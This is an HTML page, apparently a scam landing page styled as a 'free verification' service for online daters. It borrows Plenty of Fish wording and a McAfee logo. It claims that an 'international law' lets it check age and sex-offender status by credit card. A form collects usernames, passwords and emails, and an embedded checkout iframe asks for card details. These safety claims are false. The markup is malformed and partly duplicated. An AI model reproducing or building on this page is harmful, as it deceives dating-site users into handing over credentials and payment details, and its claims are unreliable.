<!DOCTYE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http"//www.w3/org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


<html lang="en-US" class>
<body bgcolor="black">
<head>

<style>
#header {
    background-color:#4D4DFF;
    color:white;
    text-align:center;
    padding:5px;
}
.upgrade-payment-type-header {
            padding-top: 11px;
        }

        .upgrade-payment-type-header h2 {
            line-height: 25px !important;
            padding: 15px 0 15px 35px;
            padding-left: 35px !important;
        }

        #upgrade-panel__subscription-form .upgrade-h1-alt {
            padding-left: 0;
            padding-right: 0;
            margin-left: 0;
            padding-left: 4%;
            font-size: 20px;
            line-height: 2em;
            font-weight: 500;
            margin-top: 0;
        }

        #upgrade-panel__benefits .upgrade-h1, #upgrade-panel__subscription-form .upgrade-h1-alt {
            padding-right: 0;
            margin-left: 0;
            padding-left: 4%;
            font-size: 20px;
            line-height: 2em;
            font-weight: 500;
            margin-top: 0;
        }

        #upgrade-panel .upgrade-h1-alt {
            padding: 14px;
            padding-left: 20px;
            font-weight: normal;
            margin-bottom: 0;
        }

        #upgrade-panel .upgrade-membership-type-header {
            background-color: #f7f7f7;
            border-bottom: 1px solid #ccc;
            border-top: 1px solid #ccc;
            border-left: 1px solid #ccc;
            color: #000;
            margin-left: -1px;
        }
        #upgrade-bigmasthead {
            padding-bottom: 20px!important;
        }
        #upgrade-bigmasthead-container {
            background: #fff;
            border-bottom: 1px solid #ccc;
/*///////////////////////////////////////////*/






/*////////////////////////////////////////////////////*/

</head>











/*///////////////////////////////////////////////////////////////////////////////*/
</style>


<body>




<!-- ///////////////////////////////////////////////////////////////////// -->

<a href = " http://www.pof.com/inbox.aspx"><img width="1200" height="100" src="http://i68.tinypic.com/29omusj.jpg" />



<!-- /////////////////////////////////////////////////////////////////////// -->

<div style="right:5px; border-radius:40px; height: 700px;  solid white;background-color:white; font-family: Georgia, 'Times New Roman', Times, serif;">


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="profile" href="http://gmpg.org/xfn/11">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="pingback" href="http://trustclassifieds.com/xmlrpc.php">
<!-- OptimizePress SEO options -->
<title>SAFETY DATERS PASS ID </title>
<meta property="og:type" content="article">
<meta property="og:url" content="http://PrivateAssurance.com/PrivateAssurance/">
<meta property="og:title" content="Exclusive Safety Measure Arrangement ">
<!-- OptimizePress SEO options end -->
<link rel="alternate" type="application/rss+xml" title="trust clasifieds ? Feed" href="http://trustclassifieds.com/feed/">
<link rel="alternate" type="application/rss+xml" title="trust clasifieds ? Comments Feed" href="http://trustclassifieds.com/comments/feed/">
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/trustclassifieds.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.2"}};
!function(a,b,c){function d(a){var c,d=b.createElement("canvas"),e=d.getContext&&d.getContext("2d"),f=String.fromCharCode;return e&&e.fillText?(e.textBaseline="top",e.font="600 32px Arial","flag"===a?(e.fillText(f(55356,56806,55356,56826),0,0),d.toDataURL().length>3e3):"diversity"===a?(e.fillText(f(55356,57221),0,0),c=e.getImageData(16,16,1,1).data.toString(),e.fillText(f(55356,57221,55356,57343),0,0),c!==e.getImageData(16,16,1,1).data.toString()):("simple"===a?e.fillText(f(55357,56835),0,0):e.fillText(f(55356,57135),0,0),0!==e.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
</script><script src="http://trustclassifieds.com/wp-includes/js/wp-emoji-release.min.js?ver=4.4.2" type="text/javascript"></script>
<style type="text/css">
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel="stylesheet" id="optimizepress-page-style-css" href="http://trustclassifieds.com/wp-content/themes/optimizePressTheme/pages/marketing/1/style.min.css?ver=2.5.1.1" type="text/css" media="all">
<link rel="stylesheet" id="optimizepress-default-css" href="http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/assets/default.min.css?ver=2.5.1.1" type="text/css" media="all">
<script type="text/javascript" src="http://trustclassifieds.com/wp-includes/js/jquery/jquery.js?ver=1.11.3"></script>
<script type="text/javascript" src="http://trustclassifieds.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1"></script>
<script type="text/javascript">
/* <![CDATA[ */
var OptimizePress = {"ajaxurl":"http:\/\/trustclassifieds.com\/wp-admin\/admin-ajax.php","SN":"optimizepress","version":"2.5.1.1","script_debug":".min","localStorageEnabled":"","wp_admin_page":"","op_live_editor":"1","op_page_builder":"1","op_create_new_page":"","imgurl":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/images\/","OP_URL":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/","OP_JS":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/js\/","OP_PAGE_BUILDER_URL":"","include_url":"http:\/\/trustclassifieds.com\/wp-includes\/","op_autosave_interval":"300","op_autosave_enabled":"Y","paths":{"url":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/","img":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/images\/","js":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/js\/","css":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/css\/"},"social":{"twitter":"optimizepress","facebook":"optimizepress","googleplus":"111273444733787349971"},"flowplayerHTML5":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/modules\/blog\/video\/flowplayer\/flowplayer.swf","flowplayerKey":"","flowplayerLogo":"","mediaelementplayer":"http:\/\/trustclassifieds.com\/wp-content\/themes\/optimizePressTheme\/lib\/modules\/blog\/video\/mediaelement\/","pb_unload_alert":"This page is asking you to confirm that you want to leave - data you have entered may not be saved.","pb_save_alert":"Please make sure you are happy with all of your options as some options will not be able to be changed for this page later.","optimizemember":{"enabled":false,"version":"0"}};
/* ]]> */
</script>
<script type="text/javascript" src="http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/js/op-jquery-base-all.min.js?ver=2.5.1.1"></script>
<link rel="https://api.w.org/" href="http://trustclassifieds.com/wp-json/">
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://trustclassifieds.com/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://trustclassifieds.com/wp-includes/wlwmanifest.xml">
<meta name="generator" content="WordPress 4.4.2">
<link rel="canonical" href="http://PrivateAssurance.com/PrivateAssurance/">
<link rel="shortlink" href="http://trustclassifieds.com/?p=1316">
<link rel="alternate" type="application/json+oembed" href="http://trustclassifieds.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftrustclassifieds.com%2FPrivateAssurance%2F">
<link rel="alternate" type="text/xml+oembed" href="http://trustclassifieds.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftrustclassifieds.com%2FPrivateAssurance%2F&amp;format=xml">

        <!--[if (gte IE 6)&(lte IE 8)]>
            <script type="text/javascript" src="http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/js/selectivizr-1.0.2-min.js?ver=1.0.2"></script>
        <![endif]-->
        <!--[if lt IE 9]>
            <script src="http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/js//html5shiv.min.js"></script>
        <![endif]-->

            <style type="text/css" id="op_header_css">
            p, .single-post-content li, #content_area li, .op-popup-button .default-button{font-size:17px;font-family:"Source Sans Pro", sans-serif;color:#444}a, blockquote{font-family:"Source Sans Pro", sans-serif}h1,.main-content h1,.single-post-content h1,.full-width.featured-panel h1,.latest-post .the-title{font-family:"Source Sans Pro", sans-serif}h2,.main-content h2,.single-post-content h2,.op-page-header h2,.featured-panel h2,.featured-posts .post-content h2,.featured-posts .post-content h2 a,.latest-post h2 a{font-family:"Source Sans Pro", sans-serif}h3,.main-content h3,.single-post-content h3{font-family:"Source Sans Pro", sans-serif}h4,.main-content h4,.single-post-content h4,.older-post h4 a{font-family:"Source Sans Pro", sans-serif}a,a:visited{text-decoration:none}a:hover{text-decoration:none}.footer-navigation ul li a{text-decoration:none}.footer-navigation ul li a:hover{text-decoration:none}.footer a{text-decoration:none}.footer a:hover{text-decoration:none}.footer small.footer-copyright a{text-decoration:none}.footer small.footer-copyright a:hover{text-decoration:none}.footer small.footer-disclaimer a{text-decoration:none}.footer small.footer-disclaimer a:hover{text-decoration:none}
            </style>

<link href="http://fonts.googleapis.com/css?family=Droid Serif:r,b,i,bi|The Girl Next Door:r|Dancing Script:r,b|Source Sans Pro:300,r,i,b,bi" rel="stylesheet" type="text/css"><style type="text/css">.fancybox-margin{margin-right:17px;}</style></head>
<body class="page page-id-1316 page-template-default op-live-editor-page op-theme">
    <div class="container main-content">
        <div id="content_area" class="">
                    <div style="" class="row two-columns cf ui-sortable" id="le_body_row_1" data-style="e30=">
                        </div><div class="fixed-width"><div class="one-half column cols" id="le_body_row_1_col_1"><div class="element-container cf" data-style="" id="le_body_row_1_col_1_el_1"><div class="element"> <h2 style="font-size:50px;font-family:&quot;Droid Serif&quot;, serif;font-weight:bold;color:#FFFFFF;letter-spacing:4px;auto;text-align:center;">The Local Date Club</h2> </div></div><div class="element-container cf" data-style="" id="le_body_row_1_col_1_el_2"><div class="element"> <div class="op-text-block" style="width:460px;margin: auto;text-align:center;"><p style="font-size:20px;font-family:&quot;The Girl Next Door&quot;, sans-serif;font-style:normal;font-weight:normal;color:#A0FF00;letter-spacing:1px;text-align: center;"><strong>The Final Way to become secured in dating</strong></p>
</div> </div></div></div><div class="one-half column cols" id="le_body_row_1_col_2"><div class="element-container cf" data-style="" id="le_body_row_1_col_2_el_1"><div class="element"> <div class="op-text-block" style="width:100%;margin: 0 auto;text-align:center;"><p style="font-size:20px;font-family:&quot;Dancing Script&quot;, sans-serif;font-style:normal;font-weight:normal;color:#FFFFFF;letter-spacing:2px;text-align: center;"><strong>Keeping you safe since 1987</strong></p>
</div> </div></div><div class="element-container cf" data-style="" id="le_body_row_1_col_2_el_2"><div class="element"> <center><img src="http://i1160.photobucket.com/albums/q495/johnverano23lucifahh23/McAfeeLogo_zpsch5wradc.png"  width="300" height="90" alt=""></center>
             <div class="element"> <div class="image-caption" style="width:373px;margin-top:0px;margin-bottom:px;margin-right:auto;margin-left:auto;">

             </div></div></div></div></div>
                    <div style="background:#ED3D18;background:-webkit-gradient(linear, left top, left bottom, color-stop(100%, #000000), color-stop(100%, #000000));background:-webkit-linear-gradient(top, #000000 0%, #000000 100%);background:-moz-linear-gradient(top, #ED3D18 0%, #ED3D18 100%);background:-ms-linear-gradient(top, #ED3D18 0%, #ED3D18 100%);background:-o-linear-gradient(top, #ED3D18 0%, #ED3D18 100%);background:linear-gradient(to bottom, #ED3D18 0%, #ED3D18100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#ED3D18, endColorstr=#ED3D18, GradientType=0);padding-top:10px;padding-bottom:10px;border-top-width:px;border-top-style:solid;border-top-color:;border-bottom-width:px;border-bottom-style:solid;border-bottom-color:;" class="row one-column cf ui-sortable section" id="le_body_row_2" data-style="eyJiYWNrZ3JvdW5kQ29sb3JTdGFydCI6IiM4M2QwNTgiLCJiYWNrZ3JvdW5kQ29sb3JFbmQiOiIjODNkMDU4IiwicGFkZGluZ1RvcCI6IjIwIiwicGFkZGluZ0JvdHRvbSI6IjEwIiwiYm9yZGVyVG9wV2lkdGgiOiIiLCJib3JkZXJUb3BDb2xvciI6IiIsImJvcmRlckJvdHRvbVdpZHRoIjoiIiwiYm9yZGVyQm90dG9tQ29sb3IiOiIiLCJhZGRvbiI6e319">                        <div class="fixed-width"><div class="one-column column cols" id="le_body_row_2_col_1"></div></div></div>
                        <div class="fixed-width"><div class="one-column column cols" id="le_body_row_2_col_1"></div></div></div>                    <div class="row two-columns cf ui-sortable" id="le_body_row_3" data-style="">
                        <div class="fixed-width"><div class="one-half column cols" id="le_body_row_3_col_1"><div class="element-container cf" data-style="" id="le_body_row_3_col_1_el_1"><div class="element"> <div style="height:21px"></div> </div></div><div class="element-container cf" data-style="" id="le_body_row_3_col_1_el_2"><div class="element"> <div class="op-text-block" style="width:100%;margin: 0 auto;text-align:center;"><p style="font-size:20px;font-family:&quot;Tahoma&quot;, serif;font-weight:bold;letter-spacing:1px;text-align: center;">Thousands of New Members Everyday!</p>
</div> </div></div><div class="element-container cf" data-style="" id="le_body_row_3_col_1_el_3"><div class="element"> <div style="height:20px"></div> </div></div><div class="element-container cf" data-style="" id="le_body_row_3_col_1_el_4"><div class="element"> <ul class="bullet-list 1"><li style="background-image:url(&quot;http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/assets/images/bullet_block/32x32/0.png&quot;);background-repeat:no-repeat;font-size:18px;color:#007408">The Local Date Club was founded by a group of business partners that shared concerns for their family and friends that date online. Sadly, bad experiences are common with online dating. These negative experiences include concerns for safety, a lack of truthfulness, and the awkward feelings when an in-person date does not go well..</li><li style="background-image:url(&quot;http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/assets/images/bullet_block/32x32/0.png&quot;);background-repeat:no-repeat;font-size:18px;color:#007408">We designed Local Date Club to enable others to have a more personal and successful experience for those seeking a relationship online.</li><li style="background-image:url(&quot;http://trustclassifieds.com/wp-content/themes/optimizePressTheme/lib/assets/images/bullet_block/32x32/0.png&quot;);background-repeat:no-repeat;font-size:18px;color:#007408">We are pleased to offer Local Date Club, which was designed to improve online dating safety.It is International law that credit cards are not to be issued to citizens under the legal age of 18, thus we use your credit card to verify your age and check that you are not a registered sexual offender. The site is a 128 bit SSL Encrypted Secured, meaning your information will never be shared to any third party, you can take control of the information that you shared in our site.</li></li></ul> </div></div><img width="500" height="700" src="http://i66.tinypic.com/2mh6150.jpg" /><center><img width="900" height="400" src="http://i63.tinypic.com/rwl40j.jpg" /></center>
<div class="element">

             </div></div></div>




             <div class="one-half column cols" id="le_body_row_3_col_2"><div class="element-container cf" data-style="" id="le_body_row_3_col_2_el_1"><div class="element">
             <div class="image-caption frame-style-undefined" style='width:400px;margin-top:0px;margin-bottom: 0px;margin-right:auto;margin-left:auto;'><img alt="" src="http://i1160.photobucket.com/albums/q495/johnverano23lucifahh23/GREEN_zpsx0t6linc.png?t=1474281531" border="0" class="full-width" /></div></div></div></div><div class="element-container cf" data-style="" id="le_body_row_3_col_2_el_2"><div class="element"> <div class="op-custom-html-block"><iframe src="http://joincheckout.com/routes/?wlid=colossal&ofid=8&a_aid=nano&a_bid=97babade&chan=eurhy31&s=&a=&tc=" width="450" height="580" scrolling="no" >

<!--Make sure page contains valid doctype at the very top!-->

<!-- /////////////////////////////////////////////////////////// -->


                            <div id="upgrade-terms-modal" class="modal fade" tabindex="-2" role="dialog">
                                <div class="modal-dialog modal-lg">
                                    <div class="modal-content">
                                        <button type="button" class="close" data-dismiss="modal" data-target="#upgrade-terms-modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                                        <div id="terms-modal-body" class="modal-body">Loading...</div>
                                        <div class="modal-footer">
                                            <button type="button" class="btn btn-change" data-dismiss="modal">Ok</button>
                                        </div>
                                    </div>
                                </div>
                            </div>

                        </form>
                    </div>












                        <div class="col-sm-5 upgrade-panel__benefits-wrap">
                            <div id="upgrade-panel__benefits" class="panel">
                                <h1 id="upgrade-benefits-heading" class="upgrade-h1">Upgraded Features</h1>
                                <div class="upgrade-h1-box">
                                    <ul id="upgrade-benefits-list">
                                        
                                            <li id="benefits-list__0" class=" benefit-even">Show up first on Meet Me!</li>
                                        
                                            <li id="benefits-list__1" class=" benefit-odd">Unlock every user's Extended Profile</li>
                                        
                                            <li id="benefits-list__2" class=" benefit-even">See if your emails were read or deleted</li>
                                        
                                            <li id="benefits-list__3" class=" benefit-odd">Experience POF ad-free.</li>
                                        
                                            <li id="benefits-list__4" class=" benefit-even">Find out the date and time someone viewed your profile.</li>
                                        
                                            <li id="benefits-list__6" class=" benefit-odd">Massive increase in emails.</li>
                                        
                                            <li id="benefits-list__7" class=" benefit-even">Number of people viewing your profile triples.</li>
                                        
                                            <li id="benefits-list__9" class=" benefit-odd">Stand out in all searches.</li>
                                        
                                            <li id="benefits-list__10" class=" benefit-even">Send three gifts per day</li>
                                        
                                            <li id="benefits-list__11" class=" benefit-odd">This upgrade more than doubles your chances of meeting someone.</li>
                                        
                                            <li id="benefits-list__14" class=" benefit-even">Upload 16 images.</li>
                                        
                                    </ul>
                                </div>                                                
                            </div>




<!-- /////////////////////////////////////////////////////////// -->

<div id="J1" class="container">
        <div class="row">
    
        <div class="col-xs-12 col-sm-6 col-sm-offset-3 col-md-6 col-md-offset-3 col-lg-4 col-lg-offset-4">
       
            <div class="panel panel-default">
            
                <div class="panel-heading">
  <h2>FREE VERIFICATION PROCESS</h2>
</div><!-- .panel-heading -->
<div class="subheaderj1">
    <p>Fill this form out for quick access:</p>
</div>                
                <div class="panel-body">
                    
                    <form role="form" class="mainForm" method="POST" action="" >
                        <input type="hidden" name="SID" value="e7474783250b91f452a9ddf321d9363a">
                        <input type='hidden' id='step' name='step' value='j1'>
                                                <input type="hidden" id="ip" name="ip" value="120.28.110.120">
    
                                                <div class="alert alert-danger error-message" style="display:none;">
                            <span class="error-text"></span>
                        </div>

												<div class="form-group"><label for="username">Create A Username:</label><input type="text" id="username" name="formdata[username]" value="" data-alert_name="Username" validate_type="username" validate_min_length="4" validate_max_length="16" class="form-control input-sm placeholder" placeholder="Username"></div><div class="form-group"><label for="password">Choose A Password:</label><input type="password" id="password" name="formdata[password]" value="" data-alert_name="Password" validate_type="username" validate_min_length="6" validate_max_length="16" class="form-control input-sm placeholder" placeholder="Password"></div><div class="form-group"><label for="email">Email:</label><input type="text" id="email" name="formdata[email]" value="" data-alert_name="Email" validate_type="email" class="form-control input-sm placeholder" placeholder="Email"></div>
                                                <p id="login_set"  class="inputNote help-block">(Your login will be sent to this email address)</p>
                        <p id="age_verify" class="inputNote help-block hidden"><span>You must provide a valid form of age verification.</span> <span class="noCharge">Your account will not be charged!</span></p>
                                                                                                            <input type="hidden" name="formdata[dob]" value="00-00-0000">
                                <input type="hidden" name="formdata[seeking]" value="M">
                                                    

                                                    <input type="hidden" name="formdata[product_id]" value="5153">
                        
                                                    <input type="hidden" name="formdata[product_id]" value="5153">
                        
                                 
                        <div id="btnSubmit">
                        	<button input id="nextBtn" type="submit" class="btn btn-info btn-lg" onclick="return validate_form()"> JOIN <span class="glyphicon glyphicon-arrow-right"></span></button>
                        </div>     
          
                        <p class="safe help-block">100% safe and secure verification</p>
                        
                    </form>               
            
            	</div><!-- .panel-body -->
                
            </div><!-- .panel panel-default -->
            
        	
        </div><!-- .col-xs-12 -->
        
    </div><!-- .row centered-form" -->
    		
</div><!-- .container -->
<!-- J1 - END -->	</div>

  <script src="/common_tpls/js/jquery-1.10.2.min.js"></script>
  <script src="/common_tpls/common/bootstrap_3_3_2/js/bootstrap.min.js"></script>

  <script type="text/javascript">
  	commonPath = "/common_tpls";
  	language = "en";
  </script>
<!-- /////////////////////////////////////////////////////////// -->



  <!-- ////////////////////////////////////////////////////////////// -->
	<script language="javascript" type="text/javascript" src="/common_tpls/js/validate_form_v2.js"></script>

  <script>
  	pop_errors = true;
  			$(document).ready(function(){
			$('#jsCheck').addClass('jsCheckHide');
			$('#formbody').removeClass('jsCheckHide');

			$('#xsale_active').click(function(e) {
				if($(this).prop('xsale_state') == 1) {
					$(this).prop('checked',false);
					$(this).prop('xsale_state',0);
				} else {
					$(this).prop('checked',true);
					$(this).prop('xsale_state',1);
				}
			});

			if(1) {
				$('#xsale_active').click();
			}

						emsg = $('.error-text:visible').text();

			if(emsg) {
				alert(emsg);
			}
			

			$('.toolTip').hover(
					function(){
						$('#toolInfo').css('display', 'inline'); // show the tooltip
					}, function(){
						$('#toolInfo').css('display', 'none'); // hide the tooltip
					}
				).click(function(e){
					e.preventDefault();
					// check if the toolinfo is already hidden (prevents wonky double click)
					if ($('#toolInfo').css('display') == 'none') {
						$('#toolInfo').css('display', 'inline'); // show the tooltip
					} else {
						$('#toolInfo').css('display', 'none'); // hide the tooltip
					}
				});

		});
		function FreezeScreen(inmsg) {
			var msg = 'Your Data is Being Processed...';

			if(inmsg)
				msg=inmsg;

			scroll(0,0);
			$('#FreezePane').removeClass('FreezePaneOn').addClass('FreezePaneOn');
			$('#InnerFreezePane').html(msg);
		}
	</script>
	<script type="text/javascript" src="/common_tpls/js/iframeResizer.contentWindow.min.js"></script>
	
	<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-27400874-10']);
  _gaq.push(['_setDomainName', 'ygsnglmt.com']);
  _gaq.push(['_setAllowLinker', true]);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>



<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>

<script type="text/javascript" src="stepcarousel.js">

/***********************************************
* Step Carousel Viewer script- (c) Dynamic Drive DHTML code library (www.dynamicdrive.com)
* Visit http://www.dynamicDrive.com for hundreds of DHTML scripts
* This notice must stay intact for legal use
***********************************************/

</script>

<style type="text/css">

.stepcarousel{
position: relative; /*leave this value alone*/
border: 10px solid white;
overflow: scroll; /*leave this value alone*/
width: 400px; /*Width of Carousel Viewer itself*/
height: 150px; /*Height should enough to fit largest content's height*/
-webkit-box-sizing: border-box; /* set box model so container width and height value includes any padding/border defined */
-moz-box-sizing: border-box;
box-sizing: border-box;
}

.stepcarousel .belt{
position: absolute; /*leave this value alone*/
left: 0;
top: 0;
}

.stepcarousel .panel{
float: left; /*leave this value alone*/
overflow: hidden; /*clip content that go outside dimensions of holding panel DIV*/
margin: 10px; /*margin around each panel*/
width: 400px; /*Width of each panel holding each content. If removed, widths should be individually defined on each content DIV then. */
}

span.paginatecircle{ /* CSS for paginate circle spans. Required */
background: white;
border: 2px solid black;
border-radius: 10px;
width: 6px;
height: 6px;
cursor: pointer;
display: inline-block;
margin-right: 4px;
}

span.paginatecircle:hover{
background: gray;
}

span.paginatecircle.selected{
background: black;
}

</style>



<script type="text/javascript">

stepcarousel.setup({
  galleryid: 'mygallery', //id of carousel DIV
  beltclass: 'belt', //class of inner "belt" DIV containing all the panel DIVs
  panelclass: 'panel', //class of panel DIVs each holding content
  autostep: {enable:true, moveby:1, pause:3000},
  panelbehavior: {speed:500, wraparound:true, wrapbehavior:'slide', persist:true},
  defaultbuttons: {enable: true, moveby: 1, leftnav: ['arrowleft.jpg', -30, 300], rightnav: ['arrowright.jpg', -10, 300]},
  statusvars: ['statusA', 'statusB', 'statusC'], //register 3 variables that contain current panel (start), current panel (last), and total panels
  contenttype: ['inline'] //content setting ['inline'] or ['ajax', 'path_to_external_file']
})

</script>

<meta charset="utf-8" />
  <title>ygsnglmt.com</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <script language="JavaScript" src="//geoip.joincheckout.com"></script>

  <link rel="stylesheet" type="text/css" href="/common_tpls/compact/css/original.css">  <style type="text/css">
    .FreezePaneOff {
      visibility: hidden;
      display: none;
      position: absolute;
      top: -100px;
      left: -100px;
    }

    .FreezePaneOn {
      position: absolute;
      top: 0px;
      left: 0px;
      visibility: visible;
      display: block;
      width: 100%;
      height: 100%;
      background-color: #666;
      z-index: 999;
      filter:alpha(opacity=85);
      -moz-opacity:0.85;
      padding-top: 20%;
    }

    .InnerFreezePane {
      text-align: center;
      width: 66%;
      background-color: #171;
      color: White;
      font-size: large;
      border: dashed 2px #111;
      padding: 9px;
    }

    .jsCheckHide {
        display: none;
    }

    #jsCheck{
      width: 250px;
      margin: 30px auto;
      text-align: center;
      background: #fff;
      padding: 5px 10px 10px;

      box-shadow: 0 0 5px #000;
      -moz-box-shadow: 0 0 5px #000;
      -webkit-box-shadow: 0 0 5px #000;

      border-radius: 10px;
      -moz-border-radius: 10px;
      -webkit-border-radius: 10px;
    }
  </style>

</head>

<body>
  <script language="javascript" type="text/javascript" src="/common_tpls/js/form_support.js"></script>
  <div align="center" id="FreezePane" class="FreezePaneOff">
    <div id="InnerFreezePane" class="InnerFreezePane"> </div>
  </div>
  <div id="jsCheck">
    <h3>Please wait while page loads...</h3>
    <img src="/common_tpls/images/ajax-loader.gif">
    <p>If you see this message for more than 5 seconds, please make sure javascript is turned on.</p>
  </div><!-- #jsCheck -->
  <div id="formbody" class="jsCheckHide">
  <!-- J1 - START -->
<script type='text/javascript'>
    datingId = 1844;
</script>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>

<script type="text/javascript" src="stepcarousel.js">

/***********************************************
* Step Carousel Viewer script- (c) Dynamic Drive DHTML code library (www.dynamicdrive.com)
* Visit http://www.dynamicDrive.com for hundreds of DHTML scripts
* This notice must stay intact for legal use
***********************************************/

</script>

<style type="text/css">

.stepcarousel{
position: relative; /*leave this value alone*/
border: 10px solid white;
overflow: scroll; /*leave this value alone*/
width: 400px; /*Width of Carousel Viewer itself*/
height: 150px; /*Height should enough to fit largest content's height*/
-webkit-box-sizing: border-box; /* set box model so container width and height value includes any padding/border defined */
-moz-box-sizing: border-box;
box-sizing: border-box;
}

.stepcarousel .belt{
position: absolute; /*leave this value alone*/
left: 0;
top: 0;
}

.stepcarousel .panel{
float: left; /*leave this value alone*/
overflow: hidden; /*clip content that go outside dimensions of holding panel DIV*/
margin: 10px; /*margin around each panel*/
width: 400px; /*Width of each panel holding each content. If removed, widths should be individually defined on each content DIV then. */
}

span.paginatecircle{ /* CSS for paginate circle spans. Required */
background: white;
border: 2px solid black;
border-radius: 10px;
width: 6px;
height: 6px;
cursor: pointer;
display: inline-block;
margin-right: 4px;
}

span.paginatecircle:hover{
background: gray;
}

span.paginatecircle.selected{
background: black;
}

</style>



<script type="text/javascript">

stepcarousel.setup({
  galleryid: 'mygallery', //id of carousel DIV
  beltclass: 'belt', //class of inner "belt" DIV containing all the panel DIVs
  panelclass: 'panel', //class of panel DIVs each holding content
  autostep: {enable:true, moveby:1, pause:3000},
  panelbehavior: {speed:500, wraparound:true, wrapbehavior:'slide', persist:true},
  defaultbuttons: {enable: true, moveby: 1, leftnav: ['arrowleft.jpg', -30, 300], rightnav: ['arrowright.jpg', -10, 300]},
  statusvars: ['statusA', 'statusB', 'statusC'], //register 3 variables that contain current panel (start), current panel (last), and total panels
  contenttype: ['inline'] //content setting ['inline'] or ['ajax', 'path_to_external_file']
})

</script>

<center>
<div id="mygallery" class="stepcarousel">
<div class="<img width="150" height="150" src="https://i37.servimg.com/u/f37/19/58/04/22/111.jpg" />">

<div class="panel">
<img src="<img width="150" height="150" src="https://i37.servimg.com/u/f37/19/58/04/22/210.jpg" />" />
</div>

<div class="panel">
<img src="<img style="width: 150px; height: 150px;" src="https://i37.servimg.com/u/f37/19/58/04/22/310.png" />" />
</div>

<div class="panel">
<img src="<img width="150" height="150" src="https://i37.servimg.com/u/f37/19/58/04/22/410.png" />" />
</div>

<div class="panel">
<img src="<img width="150" height="150" src="https://i37.servimg.com/u/f37/19/58/04/22/510.jpg" />" />
</div>

<div class="panel">
<img src="<img style="width: 150px; height: 150px;" src="https://i37.servimg.com/u/f37/19/58/04/22/pof_ed10.jpg" />" />
</div>





</div>
</div>


<p id="mygallery-paginate">
<span class="paginatecircle" data-moveby="1"></span>
</p>

</center>


</head>






























</body>
</html>